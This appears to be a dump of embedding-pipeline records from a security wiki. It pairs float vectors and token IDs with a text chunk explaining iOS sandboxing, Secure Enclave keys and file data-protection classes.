0.6863869428634644, 0.4519180953502655, 0.02737445756793022, 0.2361716479063034, -1.436130404472351, 0.585914134979248, -0.7184985876083374, -0.7350767254829407, 0.41408902406692505, 0.17146436870098114, 0.2813480794429779, -1.996888518333435, 4.225858211517334, 1.2959394454956055, 0.24343988299369812, 0.5029224753379822, 0.6504265069961548, 0.9283719062805176, 0.39524373412132263, -0.4328165650367737, 0.1219579204916954, -0.26665860414505005, 0.4992635250091553, -1.2908438444137573, 0.6381725072860718, 0.02726132981479168, -0.7805983424186707, 0.23766247928142548, -0.09120862931013107, -0.19820411503314972, 0.4504009783267975, -0.45540985465049744, -0.8348792791366577, 0.24760013818740845, 0.39867112040519714, 0.20849201083183289, 0.16079777479171753, -0.3412911295890808, 0.6389856338500977, -0.1940823644399643, 0.5716297626495361, -0.004735070280730724, -0.10821346193552017, -0.7923213243484497, 1.017238736152649, -0.4951610565185547, -0.16183312237262726, 0.600936770439148, 0.43394604325294495, -0.3326818645000458, 0.09662789106369019, 0.36040374636650085, -0.2552175521850586, 0.2236398607492447, -0.15201586484909058, 0.018432874232530594, 0.3411306142807007, 0.4594065546989441, -0.8167732357978821, -0.7095540761947632, 1.0582737922668457, -0.5559213757514954, 0.2363949865102768, -0.5289896726608276, 1.0025449991226196, -0.01730954460799694, -0.2633383870124817, -0.5183935165405273, 0.31731289625167847, -0.14915335178375244, 0.12117653340101242, -0.3816893994808197, 0.15252789855003357, -0.2238149791955948, -0.17664843797683716, -0.38610973954200745, -0.8318607211112976, -0.01720510795712471, -0.4858222007751465, 0.4432057738304138, 0.05843598023056984, -0.15710461139678955, 0.4339848458766937, -0.14297977089881897, -0.18837127089500427, -0.6332617402076721, 0.3298466205596924, 0.14010074734687805, 0.1320917159318924, 0.7858774065971375, 0.39771977066993713, -0.4503297209739685, 0.12093048542737961, 0.1252955049276352, -0.3265889585018158, 0.11823844909667969, 0.9797300696372986, -0.01963399164378643, -0.5185611844062805, 0.04156426340341568, -0.25262507796287537, -0.514766275882721, 0.6377840638160706, 0.36267411708831787, 0.4395606815814972, -0.8562430143356323, 0.29775193333625793 ]
[ 9480, 2011, 1996, 2451, 1012, 4661, 1010, 1996, 2838, 2122, 2578, 3073, 2064, 9125, 9651, 2578, 2000, 8080, 1996, 5310, 1005, 1055, 9164, 2096, 2478, 1996, 10439, 1010, 4855, 9484, 14389, 1010, 2030, 9229, 1996, 5310, 3325, 1012, 1996, 12482, 5178, 2000, 2353, 1011, 2283, 2578, 2003, 2008, 9797, 2123, 1005, 1056, 2113, 1996, 4751, 1997, 1996, 3642, 6472, 3081, 2353, 1011, 2283, 8860, 1012, 8821, 1010, 2053, 2062, 2592, 2084, 2003, 4072, 2323, 2022, 2741, 2000, 1037, 2326, 1010, 1998, 2053, 7591, 2592, 2323, 2022, 21362, 1012, 1996, 12482, 5178, 2003, 2008, 1037, 9722, 2987, 1521, 1056, 2113, 1999, 6987, 2054, 3642, 2003, 6472, 3081, 3822, 2283, 8860, 1998, 3568, 3228, 2039, 16476, 1012, 8821, 2009, 2323, 2022, 16316, 2008, 2025, 2062, 2084, 1996, 2592, 2734, 2003, 2741, 2000, 1996, 2326, 1998, 2008, 2053, 7591, 2592, 2003, 21362, 1012, 2087, 2353, 1011, 2283, 2578, 2024, 7528, 1999, 2048, 3971, 1024, 2007, 1037, 26609, 3075, 24415, 1037, 2440, 17371, 12902, 2140, 2951, 2008, 1005, 1055, 2741, 2000, 2353, 1011, 2283, 2578, 2323, 2022, 2019, 16585, 4328, 5422, 2000, 4652, 7524, 1997, 14255, 2072, 1006, 3167, 27800, 2592, 1007, 2008, 2052, 3499, 1996, 2353, 2283, 2000, 6709, 1996, 5310, 4070, 1012, 2017, 2064, 2424, 1996, 8860, 2109, 2011, 2019, 4646, 2011, 2770, 27178, 13669, 2114, 1996, 10439, 1006, 1998, 2770, 2009, 2114, 2169, 4207, 3075, 2000, 2424, 2062, 4207, 8860, 2109, 1007, 1012, 102 ]
hack_tricks
43.txt
27
[CLS] ios basicsprivilege separation and sandboxapplications the user can access run as the mobile user while critical system processes run as root. however, the sandbox allows better control over actions that processes and applications can perform. for example, even if two processes run as the same user ( mobile ), they are not allowed to access or modify each other's data. each application is installed under private / var / mobile / applications / { random id } once installed, applications have limited read access to some system areas and functions ( sms, phone call... ). if an application wants to access a protected area, a pop - up requesting permission appears. data protectionapp developers can leverage the ios data protection apis to implement fine - grained access control for user data stored in flash memory. the apis are built on top of the secure enclave processor ( sep ). the sep is a coprocessor that provides cryptographic operations for data protection and key management. a device - specific hardware key - the device uid ( unique id ) - is embedded in the secure enclave, ensuring the integrity of data protection even when the operating system kernel is compromised. when a file is created on the disk, a new 256 - bit aes key is generated with the help of secure enclave's hardware based random number generator. the content of the file is then encrypted with the generated key. and then, this key is saved encrypted with a class key along with the class id, with both data encrypted by the system's key, inside the metadata of the file. for decrypting the file, the metadata is decrypted using the system's key. then using the class id the class key is retrieved to decrypt the per - file key and decrypt the file. files can be assigned to one of four different protection classes, which are explained in more detail in the apple platform security guide : complete protection ( nsfileprotectioncomplete ) : a key derived from the user passcode and the device uid protects this class key. the derived key is wiped from memory shortly after the device is locked, making the data inaccessible until the user unlocks the device. protected unless open ( nsfileprotectioncompleteunlessopen ) : this protection class is similar to complete protection, but, if the file is opened when unlocked, the app can continue to access the file even if the user locks the
[ -0.14402256906032562, -0.6541511416435242, 0.12358998507261276, 0.7029820680618286, 0.084657222032547, -0.24199959635734558, -0.16921472549438477, -0.12081070989370346, 0.31732073426246643, 0.49728140234947205, -0.18134109675884247, 0.10971228033304214, -0.17250704765319824, 0.11117161065340042, -0.9017542004585266, -0.5609433054924011, -0.7560962438583374, 0.2526632249355316, -0.6296318769454956, 0.022829905152320862, 0.6298839449882507, 0.3307596743106842, -1.0554343461990356, -1.188564658164978, 0.26244544982910156, 0.4345181882381439, 0.8913145661354065, 0.03453422337770462, 0.31571245193481445, 1.1123692989349365, -0.34957557916641235, 0.4773761034011841, -0.08890333771705627, -0.33938896656036377, 0.48303404450416565, 0.14184661209583282, 1.1930848360061646, -0.7785139679908752, 0.07008665055036545, -0.39218616485595703, 0.40329694747924805, 0.15977181494235992, 0.1568945199251175, -0.4840441942214966, -0.05416668951511383, -0.47429460287094116, -0.4240533113479614, 0.23824091255664825, -0.001608002930879593, 0.328622043132782, 0.7170142531394958, -0.07489285618066788, 0.2536545395851135, 0.18881560862064362, -0.2874179482460022, -0.23335210978984833, 0.1510096937417984, -0.0589340478181839, -0.05614995211362839, 0.1363030970096588, -0.611893355846405, 0.19138552248477936, 0.09673693031072617, -0.7607510089874268, 0.5433838367462158, 0.5581197738647461, -0.15432953834533691, -0.4981541931629181, -0.28163942694664, -0.43021446466445923, -0.12814635038375854, 0.5842191576957703, -1.074323296546936, -0.4067623019218445, -0.3058500289916992, -0.38208168745040894, -0.07015310227870941, -0.4666282832622528, 0.46960604190826416, 0.5441337823867798, 0.2211318165063858, 0.8829604983329773, 0.3902079463005066, -0.06348107755184174, -0.3683636486530304, 0.10570293664932251, 0.13265696167945862, 0.4920881390571594, -0.5925753116607666, 0.2566978335380554, 0.05015815421938896, 0.17170460522174835, -1.0258047580718994, -0.5359328985214233, 0.3972783088684082, 0.6342606544494629, -0.033682554960250854, 0.10399062186479568, -0.016321642324328423, -0.25612011551856995, 1.012459397315979, 0.47104546427726746, -0.023181650787591934, 0.7474913597106934, -0.3034762442111969, 0.8435167670249939, 0.226457417011261, -0.06701510399580002, -0.4750109314918518, -0.5795646905899048, 0.3900739848613739, -0.2707665264606476, 0.18825264275074005, -0.737057089805603, -0.025274967774748802, 0.1337689310312271, 0.07706951349973679, 0.2548191547393799, -0.27912816405296326, 0.5811030864715576, -0.2875503897666931, 0.3871460556983948, 1.0043061971664429, 0.1144593134522438, 0.03709981217980385, -0.10266897082328796, 0.7510254383087158, 0.6337827444076538, -0.7646543383598328, -0.2368631809949875, -0.2662827670574188, -0.6093139052391052, -0.04894409701228142, 0.1553213745355606, -0.6295922994613647, 0.037292126566171646, 0.7953670024871826, -0.07001783698797226, -0.018814176321029663, -0.6769585609436035, -0.41697919368743896, -0.06566420942544937, -0.013245594687759876, 1.0869899988174438, 0.06398884207010269, 0.01055717933923006, 0.11050663143396378, -0.40051546692848206, -0.679704487323761, -0.2604226768016815, -0.0776929035782814, -0.17292745411396027, 0.5403915047645569, 0.11275970190763474, 0.12300150096416473, 0.21386568248271942, -0.7721182107925415, 0.5217756628990173, -0.30155304074287415, 0.07963059842586517, -0.6979401111602783, 0.2921620011329651, 0.563048243522644, 0.4306640028953552, -0.23956343531608582, -0.004468482453376055, -0.41827619075775146, -0.22591330111026764, -0.30500251054763794, 0.41248008608818054, 0.14322619140148163, 0.32611697912216187, -0.48137664794921875, 0.29611867666244507, 0.8262448906898499, 0.7064270973205566, -0.026293234899640083, 0.015397774986922741, -0.19233831763267517, 0.39414647221565247, -0.10646720975637436, 0.16048124432563782, 0.3428455889225006, 0.623143196105957, -0.41606801748275757, 0.30082908272743225, -0.3687998056411743, -0.4173809587955475, -0.7899282574653625, -0.17194914817810059, -0.4981565773487091, 0.3220582902431488, -0.5535814166069031, 0.09736546874046326, 0.6601044535636902, -0.13637495040893555, -0.7746095061302185, -0.24316297471523285, -0.4818107783794403, -1.3216599225997925, -0.14500433206558228, 0.37647703289985657, 0.21999269723892212, 0.18448461592197418, -0.5626779794692993, -0.026324858888983727, 0.8832162618637085, 0.6093253493309021, -0.4651423394680023, 0.3211105167865753, 1.0082290172576904, -0.19619415700435638, -0.41571158170700073, -0.3486757278442383, -0.11243266612291336, -0.344980925321579, -0.29950377345085144, 0.0972551554441452, -0.5243111848831177, 0.18903975188732147, -0.2290751338005066, 0.4620838165283203, 0.07834465056657791, 0.18140025436878204, -0.5196112394332886, -0.34831002354621887, 0.10533905029296875, 0.07326742261648178, -0.1945391595363617, -0.13347859680652618, 0.03999049961566925, 0.371869295835495, 0.18921729922294617, 1.0746687650680542, 0.1554240733385086, -0.8072109818458557, -0.44465208053588867, 0.043071333318948746, -0.27912434935569763, -0.05534364655613899, 0.02833501063287258, 1.1605685949325562, -0.016127225011587143, 0.18918591737747192, 0.8289982080459595, 0.6282597184181213, 0.399669885635376, 0.05186449736356735, 0.12087901681661606, 0.8410296440124512, 0.2049097716808319, 0.9075285792350769, 0.43017473816871643, -0.12208418548107147, -0.711811900138855, -0.25649163126945496, 0.38227909803390503, 0.6352781057357788, -0.5483550429344177, -0.7926971912384033, 0.010300572961568832, -0.040479280054569244, -0.22584384679794312, -0.23605196177959442, 0.6193771958351135, 0.7385375499725342, 0.09764734655618668, 0.17138123512268066, -0.5675945281982422, -0.8141264319419861, -0.7561527490615845, -0.17895446717739105, -1.0447231531143188, -0.6261300444602966, -1.1521100997924805, -0.07495775818824768, 0.7628265023231506, -0.19526739418506622, 0.9088286757469177, -0.22346894443035126, -0.29365700483322144, 0.501644492149353, -0.32244226336479187, 0.3602941334247589, -0.04217730835080147, -0.13453420996665955, -0.680303692817688, -0.06632649153470993, 0.40134647488594055, 0.3907662630081177, -0.547516405582428, -0.44419291615486145, -0.4470040202140808, -0.28976908326148987, -0.028648117557168007, -0.6080162525177002, 1.0373750925064087, 0.3649168312549591, -0.20496509969234467, 0.04443806782364845, 0.3749625086784363, -0.02225286327302456, -0.021110665053129196, -0.3922730088233948, -0.2512054145336151, 0.6661328077316284, 0.16253463923931122, 0.013897373341023922, 0.7057273387908936, 0.2605116069316864, -0.6131896376609802, 0.1437944918870926, -0.39689159393310547, 0.46920788288116455, -0.4967295527458191, 0.2911613881587982, 0.6343163251876831, -0.07229585945606232, 0.24874617159366608, -0.09799006581306458, 0.09989015012979507, -0.39640292525291443, -0.26360583305358887, -0.24935467541217804, -0.48229706287384033, 0.3477553427219391, 0.5145249366760254, -1.0119580030441284, 0.3216390907764435, -0.011919602751731873, -0.40183380246162415, -0.17777536809444427, 0.07031317800283432, 0.7553192377090454, -0.12058530747890472, -0.06948501616716385, -0.5283005237579346, -0.10825637727975845, 0.03344320133328438, -0.114300936460495, -0.16669480502605438, -0.6736900210380554, 0.33641237020492554, -0.20936255156993866, -0.06803712248802185, 0.3635587990283966, 0.18313834071159363, -0.3883875012397766, -0.3764812648296356, -0.37912943959236145, -0.1982528120279312, -0.09461118280887604, 0.41654565930366516, 0.13692119717597961, -0.3624243438243866, 0.5754521489143372, -0.32013553380966187, -0.32897651195526123, -0.430179238319397, -0.20355801284313202, 0.583157479763031, -0.2568719983100891, -0.44591566920280457, 0.4136577546596527, -0.4728429913520813, -0.6625396013259888, -0.21313607692718506, 0.2796384394168854, 0.0013923718361184, -0.09661869704723358, 0.5967329144477844, -0.3096467852592468, -0.12572336196899414, 0.6167493462562561, -0.010763556696474552, -0.18569855391979218, 0.9423014521598816, 0.33771494030952454, 0.7050178050994873, -0.005992308259010315, 0.487535685300827, -0.014283090829849243, -0.2991332709789276, 0.6147067546844482, 0.48895883560180664, -0.13806205987930298, -0.6963271498680115, -0.19205163419246674, -0.08843787759542465, -0.5809598565101624, 0.18062730133533478, 0.0410759374499321, 0.1445603370666504, 0.10945607721805573, -0.6262718439102173, -0.9764771461486816, 0.4648883640766144, 0.7516728043556213, 0.9488929510116577, 0.17975671589374542, 1.303168773651123, 0.05103502795100212, -0.4161904454231262, 0.4931133985519409, -0.8019963502883911, 0.3254353106021881, 0.12359738349914551, 0.6033132672309875, -0.24867874383926392, -0.3951561748981476, -0.4981078803539276, -0.047698378562927246, -0.26725128293037415, -0.09977589547634125, 0.34212392568588257, 0.10629040002822876, -0.6100557446479797, -0.6820282936096191, -0.12410164624452591, -0.044943127781152725, -0.43968838453292847, 0.07551024109125137, 0.3470019996166229, 0.2588382661342621, 0.18973509967327118, -0.3114151358604431, 0.3490676283836365, -0.5741323232650757, 0.3803354799747467, -0.22256088256835938, -0.014829765073955059, -0.36335670948028564, -0.8026211857795715, -0.14853829145431519, 0.06711874902248383, 0.16990792751312256, 0.110826276242733, 0.130531445145607, 0.204788476228714, -0.776252269744873, -0.4094478189945221, 1.0624864101409912, -0.4042471945285797, -0.4172046482563019, -0.24351844191551208, 0.146669402718544, 0.44067320227622986, 0.4718386232852936, 0.13706113398075104, 0.03348899260163307, 0.14905007183551788, -0.642253041267395, 0.4112091064453125, -1.0122883319854736, -0.900440514087677, -0.44157543778419495, 0.294633686542511, -0.24732305109500885, 0.047973331063985825, -0.7168447971343994, 0.4735477566719055, -0.08776561915874481, -0.10014472156763077, -0.16841435432434082, -0.2673761546611786, 0.7176493406295776, -0.21610693633556366, 0.13407187163829803, 0.4386093020439148, 0.5103296041488647, -0.224314346909523, 0.4081318974494934, -0.1390901803970337, -0.4393744468688965, 0.5989478230476379, -0.754364013671875, 0.8366961479187012, 0.2078564167022705, -0.2979992926120758, -0.20812100172042847, -0.42448127269744873, 0.10994193702936172, -0.1819683462381363, 0.10833072662353516, -0.6123611927032471, -0.16610467433929443, -0.23580996692180634, 0.2624676525592804, 0.2655598819255829, 1.3186720609664917, 0.21610242128372192, -0.16900238394737244, 0.16513969004154205, 0.45396289229393005, -0.21139205992221832, -0.41702571511268616, -0.33496078848838806, -0.11746179312467575, -0.1118006631731987, -0.42226776480674744, 0.6605744361877441, 0.2987897992134094, 0.012799437157809734, 0.5479413866996765, 0.34617406129837036, -0.2749398350715637, -1.1574598550796509, -0.2832241654396057, -0.34001946449279785, 0.4825540781021118, -0.12623590230941772, -0.0057842908427119255, -0.022614017128944397, -0.13085253536701202, 0.03994634374976158, 0.2240617573261261, 0.4882073700428009, -0.13290245831012726, 0.09132450819015503, 0.1354513168334961, 0.6248247623443604, -0.03946623578667641, 0.23761333525180817, 0.4829614758491516, 0.1538144201040268, -0.6082011461257935, -0.4766259789466858, -0.5626552104949951, -0.39701640605926514, -0.6700054407119751, 0.313812792301178, -0.4825020730495453, 0.5347281098365784, -0.06395260989665985, -0.5049492120742798, -0.0679425299167633, 0.30168500542640686, -0.19381001591682434, -0.25362056493759155, -0.12599970400333405, 0.10416965931653976, 0.13314823806285858, 0.2286674529314041, -0.005875882692635059, -0.6288493275642395, -0.1490415781736374, -0.03881530091166496, 0.5551335215568542, -0.736104428768158, -0.12251678109169006, 0.37059202790260315, 0.07654103636741638, 0.19993183016777039, 0.08434190601110458, -0.3240772485733032, -0.7556909322738647, -0.47947922348976135, 0.10082253813743591, 0.010701642371714115, 0.5599127411842346, -0.724082350730896, 0.4588141441345215, -0.05677717924118042, -0.2494974136352539, 0.23966753482818604, -0.5340253114700317, 0.05677180737257004, -0.3394317030906677, 0.717656672000885, -0.38011911511421204, 0.5658504962921143, 0.06599122285842896, 0.8339320421218872, 0.280867338180542, 0.3700200319290161, -0.37659770250320435, 0.28249305486679077, -0.3444022536277771, -1.0838987827301025, 0.7823088765144348, -0.11542046070098877, -0.4035237729549408, -0.12902171909809113, 0.22954033315181732, 0.1674898862838745, -0.320226788520813, -0.40536215901374817, 1.1634846925735474, 0.38974300026893616, 0.14132724702358246, -0.6312726140022278, 0.30673009157180786, -0.10227183252573013, -0.5933578610420227, -0.07390891015529633, -0.17314396798610687, -0.10257644206285477, 0.19501154124736786, -0.4191892147064209, -0.3984282612800598, -1.0975950956344604, -0.3580171465873718, 0.2733897566795349, 0.11899878829717636, 0.4259035587310791, -0.6702331304550171, -0.4417891800403595, -0.10587113350629807, 0.0672980546951294, -0.10224787145853043, 0.0663638561964035, 0.6307482719421387, 0.2868220806121826, 0.06873266398906708, -0.045544642955064774, 0.28880006074905396, -0.10727503150701523, -0.5720557570457458, 0.5970293879508972, 0.030140163376927376, -0.7073265314102173, 0.5377649068832397, 0.1305687427520752, -0.9693040251731873, -0.13860340416431427, -0.6807414293289185, -0.11301737278699875, 0.6906368732452393, -0.33712390065193176, -0.050462231040000916, 0.07718101888895035, -0.24457943439483643, 0.2642102837562561, 0.6430813670158386, 0.9914766550064087, -0.005764898844063282, -0.3852055072784424, 0.21232375502586365, -0.02890876494348049, -0.12081221491098404, 0.6256470680236816, -1.0187605619430542, -0.744391143321991, -0.3549235463142395, -0.5765768885612488, -0.021176772192120552, 0.27574166655540466, 0.9241663813591003, -0.23692689836025238, 0.1301652193069458, -0.2558318078517914, 0.15054433047771454, 0.46357062458992004, 0.17158308625221252, 0.14591321349143982, 0.9767613410949707, 0.10492624342441559, -0.5912680625915527, 0.1337636262178421, 0.4497528672218323, 0.24502457678318024, -0.13660785555839539, -0.6851940751075745, 0.3849101662635803, -0.1461838036775589, 0.012822087854146957, -0.5298596620559692, -0.36080557107925415, -1.0187745094299316, -0.491275817155838, -0.04590564966201782, -0.028611090034246445, -0.2596410810947418, 0.12736302614212036, 0.26762107014656067, -0.22402817010879517, 0.0072970823384821415, -0.49758052825927734, 0.06524902582168579, -0.5837464332580566, 0.14573636651039124, -0.9235119223594666, -0.19989758729934692, -0.004586671479046345, -0.4604858458042145, -0.1957404464483261, -0.5567498803138733, -0.24253514409065247, -0.45236968994140625, 0.07651754468679428, -0.028841445222496986, -0.783858597278595, 0.0232427716255188, -0.45919618010520935, -0.3851766884326935, -0.05537810176610947, -0.8594232201576233, -0.07547704875469208, 0.7375210523605347, -0.23108696937561035, 0.11256511509418488, 0.5604861378669739, 0.3243913948535919, 0.43972939252853394, -0.2136148363351822, 0.6517924070358276, 0.3488588333129883, -0.16637063026428223, -0.13299180567264557, 0.19013190269470215, -0.3357551097869873, 0.30087971687316895, 0.5565236210823059, -0.3382093012332916, -0.3077438771724701, -0.5546433925628662, -0.04917261004447937, 0.3892306983470917, -0.17763659358024597, 0.5470800995826721, 0.7021750807762146, -0.07314155995845795, 0.4735155999660492, -0.2577635943889618, 0.4780183434486389, 0.4013229012489319, 0.03495744615793228, 0.3587174713611603, 0.35812440514564514, 0.0257421787828207, -0.3295098543167114, -0.35109943151474, -0.08934802561998367, -0.2441841959953308, 0.18253815174102783, -0.16243226826190948, -0.304733008146286, -0.06831318140029907, -0.3597404956817627, 0.5817744731903076, 0.09225647896528244, 0.42371097207069397, 0.6380494832992554, 0.4810918867588043, -0.004603377543389797, -0.34780386090278625, -0.3291577398777008, -0.69386225938797, -0.03951657935976982, 0.4819391369819641, 0.2059307098388672, -0.5152521133422852, -0.4362383484840393, -0.01179635152220726, 0.18425890803337097, -0.11307719349861145, 0.0017427689163014293, 0.6591179966926575, -0.14415155351161957, -0.4044235348701477, 0.7334864735603333, -0.30011388659477234, 0.04008451849222183, -0.7403020262718201, 0.35226958990097046, -0.3746868669986725, -0.7707761526107788, 0.31947916746139526, 0.9167582988739014, -0.017285799607634544, -0.18380750715732574, -0.7415907979011536, -0.2839619815349579, 0.3124447762966156, -0.4182433485984802, 0.7080254554748535, 0.013588597066700459, -0.3504610061645508, 0.509682834148407, -0.9596127867698669, 0.487186461687088, -0.04345192015171051, 0.2979390323162079, -0.03870858997106552, -0.38099780678749084, -0.0646926760673523, 0.1875200718641281, 0.17776881158351898, 0.09060118347406387, 0.42289265990257263, 0.10943374782800674, 0.32054439187049866, -0.40903663635253906, 0.11662047356367111, -0.3850878179073334, 0.34442973136901855, 0.03243640065193176, -0.1932980716228485, -0.36072754859924316, 0.31812018156051636, 0.7575890421867371, -0.12760409712791443, -0.0826525017619133, 0.03571215271949768, -0.2841647267341614, -0.5656371116638184, 0.319718599319458, -0.2415175884962082, 0.04190928861498833, 0.18128842115402222, -0.3852395713329315, 0.15061065554618835, 0.029941456392407417, 0.18897709250450134, -0.19902996718883514, 0.03051101043820381, 0.5631020665168762, -0.34881362318992615, 0.6179102659225464, 0.0005112758371978998, 0.38380852341651917, 0.43072208762168884, 0.15756097435951233, -0.5528665781021118, 0.3578038215637207, 0.914953887462616, 0.08246023952960968, 0.018257886171340942, 0.6003223657608032, -0.024135498329997063, 0.19876348972320557, 0.24637708067893982, 0.28631532192230225, -0.6655406951904297, 0.1250051110982895, 0.09971503913402557, -0.4806821644306183, -0.5329391360282898, -0.059768665581941605, 0.007579932454973459, -0.30841532349586487, -0.15740728378295898, 0.056578129529953, 0.12271738797426224, -0.004224992357194424, 0.3340320289134979, -0.55035001039505, 0.1452895849943161, 0.4116764962673187, -0.22733074426651, -0.545316219329834, 0.26220306754112244, -0.31642448902130127, 0.4071727395057678, -0.16519476473331451, 0.1355724334716797, 0.3227316439151764, 0.03924689069390297, -0.18419869244098663, -0.009209997951984406, -0.09814894944429398, -0.3021904230117798, -0.20217271149158478, -0.6423346400260925, -0.6038905382156372, -0.5253716111183167, 1.3145313262939453, 0.07360329478979111, -0.44840696454048157, -0.551016628742218, -0.004233728628605604, -0.38584020733833313, -0.533182680606842, 0.4411938190460205, -0.5251241326332092, -0.042197272181510925, -0.12880130112171173, -0.4118449091911316, 0.28054746985435486, 0.6215453743934631, -0.3004215955734253, -0.5591590404510498, -0.12143362313508987, 0.23995040357112885, -0.30010470747947693, 0.9031295776367188, -0.28912267088890076, -0.1902763992547989, 0.4559774696826935, -0.8425720930099487, -0.656556248664856, -0.23825952410697937, -0.2200542837381363, -0.012916989624500275, 0.9459478259086609, 0.2510654032230377, 0.689017117023468, 0.9638745784759521, -0.1809605360031128, -0.14999517798423767, 0.3121996521949768, 0.8910000920295715, -0.6079996824264526, 0.14034812152385712, 0.1723259538412094, -0.4281114339828491, 0.11481312662363052, 0.11113009601831436, 0.9585368633270264, -0.04324301704764366, -0.5713677406311035, -0.5229186415672302, -0.18092311918735504, -0.9535194039344788, -0.04085952043533325, 0.6099560260772705, 0.04121983423829079, 0.3438746929168701, 0.3428404629230499, -0.8668743968009949, 0.24052734673023224, -0.8409778475761414, 0.21214725077152252, 0.22784850001335144, -0.2002074271440506, 0.6047156453132629, 0.09144331514835358, 0.43781837821006775, -1.1151418685913086, 4.650389194488525, 0.49598896503448486, -0.491018682718277, -0.005280687473714352, 0.20235222578048706, 0.8966814279556274, 0.6847075819969177, -1.0994359254837036, 0.23383475840091705, 0.029164515435695648, 0.3798046410083771, -0.3560737669467926, 0.4533282220363617, 0.02385367825627327, 0.333359956741333, 0.5671936273574829, -0.04473397135734558, 0.7261725068092346, 0.4504760205745697, -0.9217367768287659, -0.7723848819732666, 0.16487130522727966, -0.5849219560623169, 0.9611416459083557, 0.7751204967498779, 0.2387000322341919, 0.4255296587944031, -0.6170379519462585, -0.48882415890693665, -0.21576252579689026, -0.07925690710544586, -0.7105145454406738, 0.02551228553056717, -0.5801001191139221, -0.8425402641296387, 0.01119429524987936, 0.17811819911003113, -0.8093896508216858, -0.11003794521093369, 0.12164970487356186, -0.20001627504825592, 0.07004749029874802, 0.21398454904556274, -0.4855985939502716, -0.30443820357322693, 0.8750905990600586, -0.2976526916027069, 0.02154390700161457, 1.2264994382858276, -0.3375871777534485, 0.5544925332069397, 0.0006761751719750464, 0.6170713305473328, -0.3329867422580719, -0.7506499290466309, -0.31301620602607727, 0.3470548093318939, -0.26280689239501953, 0.3304179608821869, -0.13536293804645538, 0.893958568572998, -0.06860032677650452, 0.5867576003074646, 0.30056309700012207, -0.26705506443977356, 0.6296321749687195, -0.14616785943508148, 0.5619358420372009, -0.013402244076132774, 0.20073379576206207, -0.03408760577440262, -0.5324681997299194, -0.4270656108856201, -0.4915620684623718, 0.6676338315010071, -0.12448355555534363, 0.10687540471553802, 0.5706270337104797, -0.04861517995595932, -0.7159217596054077, -0.13978929817676544, -0.6478545665740967, -0.35997387766838074, 0.1536664217710495, 0.42126965522766113, 0.48439157009124756, -0.0751485675573349, -0.4651644825935364, 0.6948227882385254, -0.2046789824962616, 0.3551611304283142, 0.04933572933077812, -0.12439199537038803, 0.17523972690105438, 0.3032466769218445 ]
[ 101, 16380, 24078, 18098, 12848, 9463, 3351, 8745, 1998, 5472, 8758, 29098, 19341, 9285, 1996, 5310, 2064, 3229, 2448, 2004, 1996, 4684, 5310, 2096, 4187, 2291, 6194, 2448, 2004, 7117, 1012, 2174, 1010, 1996, 5472, 8758, 4473, 2488, 2491, 2058, 4506, 2008, 6194, 1998, 5097, 2064, 4685, 1012, 2005, 2742, 1010, 2130, 2065, 2048, 6194, 2448, 2004, 1996, 2168, 5310, 1006, 4684, 1007, 1010, 2027, 2024, 2025, 3039, 2000, 3229, 2030, 19933, 2169, 2060, 1005, 1055, 2951, 1012, 2169, 4646, 2003, 5361, 2104, 2797, 1013, 13075, 1013, 4684, 1013, 5097, 1013, 1063, 6721, 8909, 1065, 2320, 5361, 1010, 5097, 2031, 3132, 3191, 3229, 2000, 2070, 2291, 2752, 1998, 4972, 1006, 22434, 1010, 3042, 2655, 1012, 1012, 1012, 1007, 1012, 2065, 2019, 4646, 4122, 2000, 3229, 1037, 5123, 2181, 1010, 1037, 3769, 1011, 2039, 17942, 6656, 3544, 1012, 2951, 3860, 29098, 9797, 2064, 21155, 1996, 16380, 2951, 3860, 17928, 2015, 2000, 10408, 2986, 1011, 8982, 2098, 3229, 2491, 2005, 5310, 2951, 8250, 1999, 5956, 3638, 1012, 1996, 17928, 2015, 2024, 2328, 2006, 2327, 1997, 1996, 5851, 25867, 13151, 1006, 19802, 1007, 1012, 1996, 19802, 2003, 1037, 8872, 3217, 9623, 21748, 2008, 3640, 19888, 13705, 3136, 2005, 2951, 3860, 1998, 3145, 2968, 1012, 1037, 5080, 1011, 3563, 8051, 3145, 1011, 1996, 5080, 21318, 2094, 1006, 4310, 8909, 1007, 1011, 2003, 11157, 1999, 1996, 5851, 25867, 1010, 12725, 1996, 11109, 1997, 2951, 3860, 2130, 2043, 1996, 4082, 2291, 16293, 2003, 20419, 1012, 2043, 1037, 5371, 2003, 2580, 2006, 1996, 9785, 1010, 1037, 2047, 17273, 1011, 2978, 29347, 2015, 3145, 2003, 7013, 2007, 1996, 2393, 1997, 5851, 25867, 1005, 1055, 8051, 2241, 6721, 2193, 13103, 1012, 1996, 4180, 1997, 1996, 5371, 2003, 2059, 4372, 26775, 22571, 3064, 2007, 1996, 7013, 3145, 1012, 1998, 2059, 1010, 2023, 3145, 2003, 5552, 4372, 26775, 22571, 3064, 2007, 1037, 2465, 3145, 2247, 2007, 1996, 2465, 8909, 1010, 2007, 2119, 2951, 4372, 26775, 22571, 3064, 2011, 1996, 2291, 1005, 1055, 3145, 1010, 2503, 1996, 27425, 1997, 1996, 5371, 1012, 2005, 11703, 2854, 13876, 2075, 1996, 5371, 1010, 1996, 27425, 2003, 11703, 2854, 13876, 2098, 2478, 1996, 2291, 1005, 1055, 3145, 1012, 2059, 2478, 1996, 2465, 8909, 1996, 2465, 3145, 2003, 5140, 2000, 11703, 2854, 13876, 1996, 2566, 1011, 5371, 3145, 1998, 11703, 2854, 13876, 1996, 5371, 1012, 6764, 2064, 2022, 4137, 2000, 2028, 1997, 2176, 2367, 3860, 4280, 1010, 2029, 2024, 4541, 1999, 2062, 6987, 1999, 1996, 6207, 4132, 3036, 5009, 1024, 3143, 3860, 1006, 24978, 8873, 2571, 21572, 26557, 3508, 9006, 10814, 2618, 1007, 1024, 1037, 3145, 5173, 2013, 1996, 5310, 3413, 16044, 1998, 1996, 5080, 21318, 2094, 18227, 2023, 2465, 3145, 1012, 1996, 5173, 3145, 2003, 8342, 2013, 3638, 3859, 2044, 1996, 5080, 2003, 5299, 1010, 2437, 1996, 2951, 29104, 2127, 1996, 5310, 19829, 2015, 1996, 5080, 1012, 5123, 4983, 2330, 1006, 24978, 8873, 2571, 21572, 26557, 3508, 9006, 10814, 2618, 4609, 3238, 26915, 1007, 1024, 2023, 3860, 2465, 2003, 2714, 2000, 3143, 3860, 1010, 2021, 1010, 2065, 1996, 5371, 2003, 2441, 2043, 14058, 1010, 1996, 10439, 2064, 3613, 2000, 3229, 1996, 5371, 2130, 2065, 1996, 5310, 11223, 1996 ]
hack_tricks
430.txt
0
